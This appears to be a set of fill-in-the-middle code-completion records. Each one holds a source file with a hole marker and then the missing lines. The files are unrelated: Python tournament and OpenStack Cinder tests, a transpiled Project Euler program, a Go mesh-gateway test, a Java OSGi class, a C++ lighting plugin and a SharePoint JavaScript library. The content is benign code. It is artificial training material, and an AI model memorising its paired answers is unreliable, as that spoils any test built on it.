self.usa.add_friendly_result(opponent=Team.get_for_country(self.teams, "Israel"), result=Team.DRAW) self.assertEqual(prev_draws + 1, len(self.usa.friendly_results['draws'])) def test_base_score(self): # these tests operate using some basic, commonly held assumptions (which could actually be a source of human error) self.assertGreater(self.brazil.base_score, self.usa.base_score) self.assertGreater(self.usa.base_score, Team.get_for_country(self.teams, "Ghana").base_score) def test_get_for_country(self): self.assertEqual(Team.get_for_country(self.teams, 'Brazil').country, 'Brazil') def test_get_for_group(self): self.assertIn(Team.get_for_country(self.teams, 'Brazil'), Team.get_for_group(self.teams, 'A')) self.assertNotIn(Team.get_for_country(self.teams, 'Brazil'), Team.get_for_group(self.teams, 'B')) class TestTournament(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams def test_get_group_winners(self): winners = self.tournament.get_group_winners('A') self.assertEqual(winners[0].country, 'Brazil') self.assertEqual(winners[1].country, 'Mexico') class TestTree(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams self.tree = ProbableTournamentTree(self.tournament) def test_get_opponent_at_stage(self): brazil = Team.get_for_country(self.teams, 'Brazil') mexico = Team.get_for_country(self.teams, 'Mexico') cameroon = Team.get_for_country(self.teams, 'Cameroon') spain = Team.get_for_country(self.teams, 'Spain') netherlands = Team.get_for_country(self.teams, 'Netherlands') opp = self.tree.get_opponent_at_stage(brazil, 0) self.assertEqual(opp.country, netherlands.country) opp = self.tree.get_opponent_at_stage(brazil, 1) self.assertEqual(opp.country, Team.get_for_country(self.teams, 'Colombia').country) opp = self.tree.get_opponent_at_stage(brazil, 3) self.assertEqual(opp.country, spain.country) opp = self.tree.get_opponent_at_stage(netherlands, 0) self.assertEqual(opp.country, brazil.country)<|fim▁hole|> self.assertEqual(opp.country, spain.country) # test for a team that isn't in the probability tree self.assertEqual(self.tree.get_opponent_at_stage(cameroon, 0).country, self.tree.get_opponent_at_stage(mexico, 0).country) if __name__ == '__main__': unittest.main()<|fim▁end|>
opp = self.tree.get_opponent_at_stage(mexico, 0)
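Spliced back into its gap, the one-line completion above restores the elided call in TestTree.test_get_opponent_at_stage; the excerpt below simply re-joins text already present in the row, with line breaks restored:

    opp = self.tree.get_opponent_at_stage(netherlands, 0)
    self.assertEqual(opp.country, brazil.country)
    opp = self.tree.get_opponent_at_stage(mexico, 0)   # <- the completion cell
    self.assertEqual(opp.country, spain.country)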
<|file_name|>test_volume_types_extra_specs.py<|end_file_name|><|fim▁begin|># Copyright (c) 2011 Zadara Storage Inc. # Copyright (c) 2011 OpenStack Foundation # Copyright 2011 University of Southern California # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Unit Tests for volume types extra specs code """ from cinder import context from cinder import db from cinder import test class VolumeTypeExtraSpecsTestCase(test.TestCase): def setUp(self): super(VolumeTypeExtraSpecsTestCase, self).setUp() self.context = context.get_admin_context() self.vol_type1 = dict(name="TEST: Regular volume test") self.vol_type1_specs = dict(vol_extra1="value1", vol_extra2="value2", vol_extra3=3) self.vol_type1['extra_specs'] = self.vol_type1_specs ref = db.volume_type_create(self.context, self.vol_type1) self.addCleanup(db.volume_type_destroy, context.get_admin_context(), self.vol_type1['id']) self.volume_type1_id = ref.id for k, v in self.vol_type1_specs.iteritems(): self.vol_type1_specs[k] = str(v) self.vol_type2_noextra = dict(name="TEST: Volume type without extra") ref = db.volume_type_create(self.context, self.vol_type2_noextra) self.addCleanup(db.volume_type_destroy, context.get_admin_context(), self.vol_type2_noextra['id']) self.vol_type2_id = ref.id def test_volume_type_specs_get(self): expected_specs = self.vol_type1_specs.copy() actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_delete(self): expected_specs = self.vol_type1_specs.copy() del expected_specs['vol_extra2'] db.volume_type_extra_specs_delete(context.get_admin_context(), self.volume_type1_id, 'vol_extra2') actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_update(self):<|fim▁hole|> expected_specs['vol_extra3'] = "4" db.volume_type_extra_specs_update_or_create( context.get_admin_context(), self.volume_type1_id, dict(vol_extra3=4)) actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_extra_specs_create(self): expected_specs = self.vol_type1_specs.copy() expected_specs['vol_extra4'] = 'value4' expected_specs['vol_extra5'] = 'value5' db.volume_type_extra_specs_update_or_create( context.get_admin_context(), self.volume_type1_id, dict(vol_extra4="value4", vol_extra5="value5")) actual_specs = db.volume_type_extra_specs_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(expected_specs, actual_specs) def test_volume_type_get_with_extra_specs(self): volume_type = db.volume_type_get( context.get_admin_context(), self.volume_type1_id) self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs) volume_type = db.volume_type_get( context.get_admin_context(), self.vol_type2_id) self.assertEqual(volume_type['extra_specs'], {}) def test_volume_type_get_by_name_with_extra_specs(self): 
volume_type = db.volume_type_get_by_name( context.get_admin_context(), self.vol_type1['name']) self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs) volume_type = db.volume_type_get_by_name( context.get_admin_context(), self.vol_type2_noextra['name']) self.assertEqual(volume_type['extra_specs'], {}) def test_volume_type_get_all(self): expected_specs = self.vol_type1_specs.copy() types = db.volume_type_get_all(context.get_admin_context()) self.assertEqual( types[self.vol_type1['name']]['extra_specs'], expected_specs) self.assertEqual( types[self.vol_type2_noextra['name']]['extra_specs'], {})<|fim▁end|>
expected_specs = self.vol_type1_specs.copy()
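The prompt above is large enough that the dump wraps it across two physical lines, so rows cannot be recovered line by line; re-segmenting on the file-name marker that opens every prompt is more robust. A sketch under that assumption (the helper name is mine, and the marker is again built by concatenation to avoid a stray sentinel):

    import re

    MARK = "<|" + "file_name" + "|>"

    def split_rows(dump: str) -> list[str]:
        # Every row opens with the file-name marker; keep it attached to its row.
        starts = [m.start() for m in re.finditer(re.escape(MARK), dump)]
        return [dump[a:b] for a, b in zip(starts, starts[1:] + [len(dump)])]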
<|file_name|>Euler_Problem-075.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2 # transpiled with BefunCompile v1.3.0 (c) 2017 import sys import zlib, base64 _g = ("Ah+LCAAAAAAABACT7+ZgAAEWhre3/LNvG0iwP1i/yPTlUbXVqdvzlJoi+a3Lj8v6RJl1JZacmaK7/Otuf07ZXEnrN/zZZ+cdV4iexrfrz59Tftsevr0tcO7wz0oLK678" + "PLvaHVX/Lff8K6otFRbb/W/369X9D7+oMAiXlZWJlbEzGIQaM4yCUTAKRsEoGPzgnzcjw4w9ejJ35HS6A8KTT0zfPp3dVXBWrHr2qoXeofNfZVm8eZ31+0g2a93585ut" + "w3JN9984E/ele8axTZZS1/4XxB6I/8bdWrVmWqrMqqVnDpeUFEb23t0kFaTV171P99WmM7e/nr75LancfFrm1OPBq7oXnf9bc4u/fb3/3oIH/XuqLEPeHm7aK7k69NbU" + "j1ON+IS38DrntEX0b9Q9bSi3fJNHZfS+7LDknKDAKz+17ksmzxX7nszEf/ni27IX/L83eufKdO3eW73qcUGUSaGGf9fjO+ecNvY8rjv2ff2Hw4HBfJrnv1rKzVuvl26p" + "vrMvWfi4740pH/MS7p499OejfabZ97vdb3Nqb4b/3CLxyEjzg4Hnz617Yp9s/1T2f3VU6Pf2nZ5/lcKOCtzecu+YOz+jZzvnrad7/hg+31n1vtguPv/Tkp0Vh4u/824s" + "fMX7Q1acAQDKcaipZwcAAA==") g = base64.b64decode(_g)[1:] for i in range(ord(base64.b64decode(_g)[0])): g = zlib.decompress(g, 16+zlib.MAX_WBITS) g=list(map(ord, g)) def gr(x,y): if(x>=0 and y>=0 and x<1000 and y<1515): return g[y*1000 + x]; return 0; def gw(x,y,v): if(x>=0 and y>=0 and x<1000 and y<1515): g[y*1000 + x]=v; def td(a,b): return ((0)if(b==0)else(a//b)) def tm(a,b): return ((0)if(b==0)else(a%b)) s=[] def sp(): global s if (len(s) == 0): return 0 return s.pop() def sa(v): global s s.append(v) def sr(): global s if (len(s) == 0): return 0 return s[-1] def _0(): gw(2,0,1000) gw(3,0,1500000) sa(gr(3,0)-1) sa(gr(3,0)) gw(tm(gr(3,0),gr(2,0)),(td(gr(3,0),gr(2,0)))+3,0) return 1 def _1(): return (2)if(sp()!=0)else(3) def _2(): sa(sr()); sa(0) v0=sp() v1=sp()<|fim▁hole|> v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) sa(sr()-1) v0=sp() v1=sp() sa(v0) sa(v1) return 1 def _3(): gw(6,0,0) gw(8,0,1) sp(); return 4 def _4(): return (21)if(((gr(8,0)*gr(8,0)*4)+(gr(8,0)*6)+2)>gr(3,0))else(5) def _5(): sa((gr(8,0)+1)*(gr(8,0)+1)*2) sa(gr(8,0)+1) gw(9,0,gr(8,0)+1) return 6 def _6(): global t0 sa(sp()*gr(8,0)*2) sa(sp()+sp()); t0=sp() t0=(1)if(t0>gr(3,0))else(0) return (20)if((t0)!=0)else(7) def _7(): global t0 global t1 global t2 t0=(gr(9,0)*gr(9,0))-(gr(8,0)*gr(8,0)) gw(2,1,(gr(9,0)*gr(9,0))-(gr(8,0)*gr(8,0))) t1=gr(8,0)*gr(9,0)*2 gw(3,1,gr(8,0)*gr(9,0)*2) t1=t1+(gr(9,0)*gr(9,0))+(gr(8,0)*gr(8,0)) gw(4,1,(gr(9,0)*gr(9,0))+(gr(8,0)*gr(8,0))) t2=t0+t1 gw(6,1,t2) return (19)if(gr(2,1)>gr(3,1))else(8) def _8(): sa(1) sa((1)if(gr(6,1)>gr(3,0))else(0)) return 9 def _9(): return (18)if(sp()!=0)else(10) def _10(): gw(8,1,sr()*((((gr(2,1)*7)+gr(3,1))*5)+gr(4,1))) sa(sr()*gr(6,1)) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() sa(gr(sp(),v0)) sa(sr()); return (13)if(sp()!=0)else(11) def _11(): sp(); sa(sr()*gr(6,1)) sa(gr(8,1)) v0=sp() v1=sp() sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) gw(6,0,gr(6,0)+1) return 12 def _12(): sa(sp()+1) sa((1)if((sr()*gr(6,1))>gr(3,0))else(0)) return 9 def _13(): return (17)if((sr()-gr(8,1))!=0)else(14) def _14(): sp(); sa(1) return 15 def _15(): return (12)if(sp()!=0)else(16) def _16(): sa(sr()*gr(6,1)) sa(-1) v0=sp() v1=sp() sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) gw(6,0,gr(6,0)-1) return 12 def _17(): sa((1)if(sp()<0)else(0)) return 15 def _18(): sp(); sa((gr(9,0)+1)*(gr(9,0)+1)*2) sa(gr(9,0)+1) gw(9,0,gr(9,0)+1) return 6 def _19(): global t0 t0=gr(2,1) gw(2,1,gr(3,1)) gw(3,1,t0) return 8 def _20(): 
gw(8,0,gr(8,0)+1) return 4 def _21(): sys.stdout.write(str(gr(6,0))+" ") sys.stdout.flush() return 22 m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21] c=0 while c<22: c=m[c]()<|fim▁end|>
sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp()
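The transpiled program above leans on deliberately forgiving primitives: popping an empty stack yields 0, and td/tm define any division or modulo by zero as 0. Restated stand-alone, with the same behavior as the helpers in the row:

    stack = []

    def sp():                 # pop; an empty stack reads as 0
        return stack.pop() if stack else 0

    def td(a, b):             # truncated division; anything / 0 is defined as 0
        return a // b if b else 0

    def tm(a, b):             # modulo with the same zero guard
        return a % b if b else 0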
<|file_name|>snigate_test.go<|end_file_name|><|fim▁begin|>// Copyright 2021 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package meshconnectord import ( "context" "io" "io/ioutil" "log" "os" "testing" "time" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/gcp" _ "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/gcp" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/hbone" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/mesh" ) // TestSNIGate is e2e, requires a k8s connection (kube config is fine) // Also requires certificates to be created - will not start agent or envoy func TestSNIGate(t *testing.T) {<|fim▁hole|> gateK8S.XDSAddr = "-" // prevent pilot-agent from starting gateK8S.BaseDir = "../../" ctx := context.Background() gcp.InitGCP(ctx, gateK8S) gate := New(gateK8S) err := gate.InitSNIGate(context.Background(), ":0", ":0") if err != nil { t.Skip("Failed to connect to start gate ", time.Since(gateK8S.StartTime), gateK8S, os.Environ(), err) } t.Log("Gate listening on ", gate.SNIListener.Addr()) t.Run("client", func(t *testing.T) { aliceMesh := mesh.New() aliceMesh.XDSAddr = "-" // prevent pilot-agent from starting aliceMesh.BaseDir = "../../" ctx, cf := context.WithTimeout(context.Background(), 5*time.Second) defer cf() err := aliceMesh.LoadConfig(ctx) if err != nil { t.Skip("Skipping test, no k8s environment") } alice := hbone.New() addr := aliceMesh.MeshConnectorAddr if addr == "" { t.Skip("Missing gate") } // TODO: use the full URL of CR, and a magic port ? // Disabled temp - would only work in cluster, needs access to the internal // address. // WIP: deploy an in-cluster test app that can be used to trigger this or port forward t.Run("sni-to-test", func(t *testing.T) { if !aliceMesh.InCluster { t.Skip("Only in-cluster") } aliceToFortio := alice.NewClient() // Create an endpoint for the gate. ep := aliceToFortio.NewEndpoint("https://" + addr + ":15443/_hbone/tcp") ep.SNI = "outbound_.8080_._.default.default.svc.cluster.local" rin, lout := io.Pipe() lin, rout := io.Pipe() err = ep.Proxy(context.Background(), rin, rout) if err != nil { t.Fatal(err) } lout.Write([]byte("GET / HTTP/1.1\n\n")) d, err := ioutil.ReadAll(lin) log.Println(d, err) }) // TODO: connect, verify tokens }) } // Manual testing, using the gate on localhost and the e2e test service: // /usr/bin/curl -v https://fortio-istio-icq63pqnqq-uc.fortio.svc.cluster.local:15443/fortio/ --resolve fortio-istio-icq63pqnqq-uc.fortio.svc.cluster.local:15443:127.0.0.1 --key var/run/secrets/istio.io/key.pem --cert var/run/secrets/istio.io/cert-chain.pem --cacert var/run/secrets/istio.io/root-cert.pem // SUFFIX=-istio make -f samples/fortio/Makefile logs |less<|fim▁end|>
gateK8S := mesh.New()
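Rows switch language from file to file (this Go test follows TypeScript and Python rows, with Java, C++, and JavaScript ahead), and the file-name sentinel is enough to tag each row. A sketch; the extension-to-language map is my own illustrative assumption:

    import os

    MARK_OPEN = "<|" + "file_name" + "|>"
    MARK_CLOSE = "<|" + "end_file_name" + "|>"
    EXT_TO_LANG = {".ts": "TypeScript", ".py": "Python", ".go": "Go",
                   ".java": "Java", ".cpp": "C++", ".js": "JavaScript"}

    def row_language(row: str) -> str:
        # Pull the file name out of the row's opening sentinel pair.
        name = row.split(MARK_OPEN, 1)[1].split(MARK_CLOSE, 1)[0]
        return EXT_TO_LANG.get(os.path.splitext(name)[1].lower(), "unknown")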
<|file_name|>RepositoryInfo.java<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2013-2013, KNOPFLERFISH project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following * conditions are met: * * - Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * - Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials * provided with the distribution. * * - Neither the name of the KNOPFLERFISH project nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.knopflerfish.service.repositorymanager; import org.osgi.framework.Constants; import org.osgi.framework.ServiceReference; import org.osgi.service.repository.Repository; public class RepositoryInfo implements Comparable<RepositoryInfo> { final private long id; final private int rank; final ServiceReference<Repository> sr; public RepositoryInfo(ServiceReference<Repository> sr) { this.id = ((Long)sr.getProperty(Constants.SERVICE_ID)).longValue(); Object r = sr.getProperty(Constants.SERVICE_RANKING); if (r != null && r instanceof Integer) { this.rank = ((Integer)r).intValue(); } else { this.rank = 0; } this.sr = sr; } public RepositoryInfo(RepositoryInfo old, int rank) { this.id = old.id; this.rank = rank; this.sr = old.sr; } public long getId() { return id; } public int getRank() { return rank; } public Object getProperty(String prop) { return sr.getProperty(prop); } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * result + (int) (id ^ (id >>> 32)); return result; } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null) return false; if (getClass() != o.getClass()) return false; RepositoryInfo rio = (RepositoryInfo) o; if (id != rio.id || rank != rio.rank) return false; return true; } @Override public int compareTo(RepositoryInfo o) { if (equals(o)) { return 0; } if (rank != o.rank) { return o.rank - rank; } else { return id < o.id ? -1 : 1; } } public ServiceReference<Repository> getServiceReference() { return sr; } @Override public String toString() { return "RepositoryInfo [id=" + id + ", rank=" + rank + "]";<|fim▁hole|><|fim▁end|>
} }
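In the Java row above the gap falls at the very end of the file: the prompt's suffix is empty and the completion is just the two closing braces. Gaps can land anywhere in a file, which a small classifier makes explicit (a sketch; the three-way labels and helper name are mine):

    BEGIN = "<|" + "fim▁begin" + "|>"
    HOLE = "<|" + "fim▁hole" + "|>"
    END = "<|" + "fim▁end" + "|>"

    def hole_position(prompt: str) -> str:
        # Classify where the gap sits relative to the file: start, middle, or end.
        body = prompt.split(BEGIN, 1)[1].rsplit(END, 1)[0]
        prefix, suffix = body.split(HOLE, 1)
        if not prefix.strip():
            return "start"
        return "end" if not suffix.strip() else "middle"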
<|file_name|>StageProfiPlugin.cpp<|end_file_name|><|fim▁begin|>/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Library General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * StageProfiPlugin.cpp * The StageProfi plugin for ola * Copyright (C) 2006-2008 Simon Newton */ #include <stdlib.h> #include <stdio.h> #include <string> #include <vector> #include "ola/Logging.h" #include "olad/PluginAdaptor.h" #include "olad/Preferences.h" #include "plugins/stageprofi/StageProfiDevice.h" #include "plugins/stageprofi/StageProfiPlugin.h" /* * Entry point to this plugin */ extern "C" ola::AbstractPlugin* create( const ola::PluginAdaptor *plugin_adaptor) { return new ola::plugin::stageprofi::StageProfiPlugin(plugin_adaptor); } namespace ola { namespace plugin { namespace stageprofi { using std::string; const char StageProfiPlugin::STAGEPROFI_DEVICE_PATH[] = "/dev/ttyUSB0"; const char StageProfiPlugin::STAGEPROFI_DEVICE_NAME[] = "StageProfi Device"; const char StageProfiPlugin::PLUGIN_NAME[] = "StageProfi"; const char StageProfiPlugin::PLUGIN_PREFIX[] = "stageprofi"; const char StageProfiPlugin::DEVICE_KEY[] = "device"; /* * Start the plugin * * Multiple devices now supported */ bool StageProfiPlugin::StartHook() { vector<string> device_names; vector<string>::iterator it; StageProfiDevice *device; // fetch device listing device_names = m_preferences->GetMultipleValue(DEVICE_KEY); for (it = device_names.begin(); it != device_names.end(); ++it) { if (it->empty()) continue; device = new StageProfiDevice(this, STAGEPROFI_DEVICE_NAME, *it); if (!device->Start()) { delete device; continue; } m_plugin_adaptor->AddSocket(device->GetSocket()); m_plugin_adaptor->RegisterDevice(device); m_devices.insert(m_devices.end(), device); } return true; } /* * Stop the plugin * @return true on success, false on failure */ bool StageProfiPlugin::StopHook() { vector<StageProfiDevice*>::iterator iter; for (iter = m_devices.begin(); iter != m_devices.end(); ++iter) { m_plugin_adaptor->RemoveSocket((*iter)->GetSocket()); DeleteDevice(*iter); } m_devices.clear(); return true; } /* * Return the description for this plugin */ string StageProfiPlugin::Description() const { return "StageProfi Plugin\n" "----------------------------\n" "\n" "This plugin creates devices with one output port.\n" "\n" "--- Config file : ola-stageprofi.conf ---\n" "\n" "device = /dev/ttyUSB0\n" "device = 192.168.1.250\n" "The device to use either as a path for the USB version or an IP address\n" "for the LAN version. Multiple devices are supported.\n"; } /* * Called when the file descriptor is closed. 
*/ int StageProfiPlugin::SocketClosed(ConnectedSocket *socket) { vector<StageProfiDevice*>::iterator iter; for (iter = m_devices.begin(); iter != m_devices.end(); ++iter) { if ((*iter)->GetSocket() == socket) break; } if (iter == m_devices.end()) { OLA_WARN << "unknown fd"; return -1; } DeleteDevice(*iter); m_devices.erase(iter); return 0; } /* * load the plugin prefs and default to sensible values * */ bool StageProfiPlugin::SetDefaultPreferences() {<|fim▁hole|> if (!m_preferences) return false; bool save = false; save |= m_preferences->SetDefaultValue(DEVICE_KEY, StringValidator(), STAGEPROFI_DEVICE_PATH); if (save) m_preferences->Save(); if (m_preferences->GetValue(DEVICE_KEY).empty()) return false; return true; } /* * Cleanup a single device */ void StageProfiPlugin::DeleteDevice(StageProfiDevice *device) { m_plugin_adaptor->UnregisterDevice(device); device->Stop(); delete device; } } // stageprofi } // plugin } // ola<|fim▁end|>
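This C++ row appears to be a degenerate case: nothing follows its end sentinel before the next row's file-name marker, so the completion cell is empty and the gap presumably covered only whitespace. Consumers of the dump may want to screen such rows out; a sketch under that assumption:

    def has_useful_completion(completion: str, min_chars: int = 1) -> bool:
        # Empty or whitespace-only completions carry no fill-in signal.
        return len(completion.strip()) >= min_chars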
<|file_name|>pnp.js<|end_file_name|><|fim▁begin|>/** * sp-pnp-js v2.0.6-beta.1 - A JavaScript library for SharePoint development. * MIT (https://github.com/SharePoint/PnP-JS-Core/blob/master/LICENSE) * Copyright (c) 2017 Microsoft * docs: http://officedev.github.io/PnP-JS-Core * source: https://github.com/SharePoint/PnP-JS-Core * bugs: https://github.com/SharePoint/PnP-JS-Core/issues */ (function webpackUniversalModuleDefinition(root, factory) { if(typeof exports === 'object' && typeof module === 'object') module.exports = factory(); else if(typeof define === 'function' && define.amd) define([], factory); else if(typeof exports === 'object') exports["$pnp"] = factory(); else root["$pnp"] = factory(); })(this, function() { return /******/ (function(modules) { // webpackBootstrap /******/ // The module cache /******/ var installedModules = {}; /******/ /******/ // The require function /******/ function __webpack_require__(moduleId) { /******/ /******/ // Check if module is in cache /******/ if(installedModules[moduleId]) /******/ return installedModules[moduleId].exports; /******/ /******/ // Create a new module (and put it into the cache) /******/ var module = installedModules[moduleId] = { /******/ i: moduleId, /******/ l: false, /******/ exports: {} /******/ }; /******/ /******/ // Execute the module function /******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__); /******/ /******/ // Flag the module as loaded /******/ module.l = true; /******/ /******/ // Return the exports of the module /******/ return module.exports; /******/ } /******/ /******/ /******/ // expose the modules object (__webpack_modules__) /******/ __webpack_require__.m = modules; /******/ /******/ // expose the module cache /******/ __webpack_require__.c = installedModules; /******/ /******/ // identity function for calling harmony imports with the correct context /******/ __webpack_require__.i = function(value) { return value; }; /******/ /******/ // define getter function for harmony exports /******/ __webpack_require__.d = function(exports, name, getter) { /******/ if(!__webpack_require__.o(exports, name)) { /******/ Object.defineProperty(exports, name, { /******/ configurable: false, /******/ enumerable: true, /******/ get: getter /******/ }); /******/ } /******/ }; /******/ /******/ // getDefaultExport function for compatibility with non-harmony modules /******/ __webpack_require__.n = function(module) { /******/ var getter = module && module.__esModule ? 
/******/ function getDefault() { return module['default']; } : /******/ function getModuleExports() { return module; }; /******/ __webpack_require__.d(getter, 'a', getter); /******/ return getter; /******/ }; /******/ /******/ // Object.prototype.hasOwnProperty.call /******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); }; /******/ /******/ // __webpack_public_path__ /******/ __webpack_require__.p = "/assets/"; /******/ /******/ // Load entry module and return exports /******/ return __webpack_require__(__webpack_require__.s = 41); /******/ }) /************************************************************************/ /******/ ([ /* 0 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; /* WEBPACK VAR INJECTION */(function(global) { Object.defineProperty(exports, "__esModule", { value: true }); var pnplibconfig_1 = __webpack_require__(4); var Util = (function () { function Util() { } /** * Gets a callback function which will maintain context across async calls. * Allows for the calling pattern getCtxCallback(thisobj, method, methodarg1, methodarg2, ...) * * @param context The object that will be the 'this' value in the callback * @param method The method to which we will apply the context and parameters * @param params Optional, additional arguments to supply to the wrapped method when it is invoked */ Util.getCtxCallback = function (context, method) { var params = []; for (var _i = 2; _i < arguments.length; _i++) { params[_i - 2] = arguments[_i]; } return function () { method.apply(context, params); }; }; /** * Tests if a url param exists * * @param name The name of the url paramter to check */ Util.urlParamExists = function (name) { name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]"); var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"); return regex.test(location.search); }; /** * Gets a url param value by name * * @param name The name of the paramter for which we want the value */ Util.getUrlParamByName = function (name) { name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]"); var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"); var results = regex.exec(location.search); return results == null ? 
"" : decodeURIComponent(results[1].replace(/\+/g, " ")); }; /** * Gets a url param by name and attempts to parse a bool value * * @param name The name of the paramter for which we want the boolean value */ Util.getUrlParamBoolByName = function (name) { var p = this.getUrlParamByName(name); var isFalse = (p === "" || /false|0/i.test(p)); return !isFalse; }; /** * Inserts the string s into the string target as the index specified by index * * @param target The string into which we will insert s * @param index The location in target to insert s (zero based) * @param s The string to insert into target at position index */ Util.stringInsert = function (target, index, s) { if (index > 0) { return target.substring(0, index) + s + target.substring(index, target.length); } return s + target; }; /** * Adds a value to a date * * @param date The date to which we will add units, done in local time * @param interval The name of the interval to add, one of: ['year', 'quarter', 'month', 'week', 'day', 'hour', 'minute', 'second'] * @param units The amount to add to date of the given interval * * http://stackoverflow.com/questions/1197928/how-to-add-30-minutes-to-a-javascript-date-object */ Util.dateAdd = function (date, interval, units) { var ret = new Date(date.toLocaleString()); // don't change original date switch (interval.toLowerCase()) { case "year": ret.setFullYear(ret.getFullYear() + units); break; case "quarter": ret.setMonth(ret.getMonth() + 3 * units); break; case "month": ret.setMonth(ret.getMonth() + units); break; case "week": ret.setDate(ret.getDate() + 7 * units); break; case "day": ret.setDate(ret.getDate() + units); break; case "hour": ret.setTime(ret.getTime() + units * 3600000); break; case "minute": ret.setTime(ret.getTime() + units * 60000); break; case "second": ret.setTime(ret.getTime() + units * 1000); break; default: ret = undefined; break; } return ret; }; /** * Loads a stylesheet into the current page * * @param path The url to the stylesheet * @param avoidCache If true a value will be appended as a query string to avoid browser caching issues */ Util.loadStylesheet = function (path, avoidCache) { if (avoidCache) { path += "?" 
+ encodeURIComponent((new Date()).getTime().toString()); } var head = document.getElementsByTagName("head"); if (head.length > 0) { var e = document.createElement("link"); head[0].appendChild(e); e.setAttribute("type", "text/css"); e.setAttribute("rel", "stylesheet"); e.setAttribute("href", path); } }; /** * Combines an arbitrary set of paths ensuring that the slashes are normalized * * @param paths 0 to n path parts to combine */ Util.combinePaths = function () { var paths = []; for (var _i = 0; _i < arguments.length; _i++) { paths[_i] = arguments[_i]; } return paths .filter(function (path) { return !Util.stringIsNullOrEmpty(path); }) .map(function (path) { return path.replace(/^[\\|\/]/, "").replace(/[\\|\/]$/, ""); }) .join("/") .replace(/\\/g, "/"); }; /** * Gets a random string of chars length * * @param chars The length of the random string to generate */ Util.getRandomString = function (chars) { var text = new Array(chars); var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < chars; i++) { text[i] = possible.charAt(Math.floor(Math.random() * possible.length)); } return text.join(""); 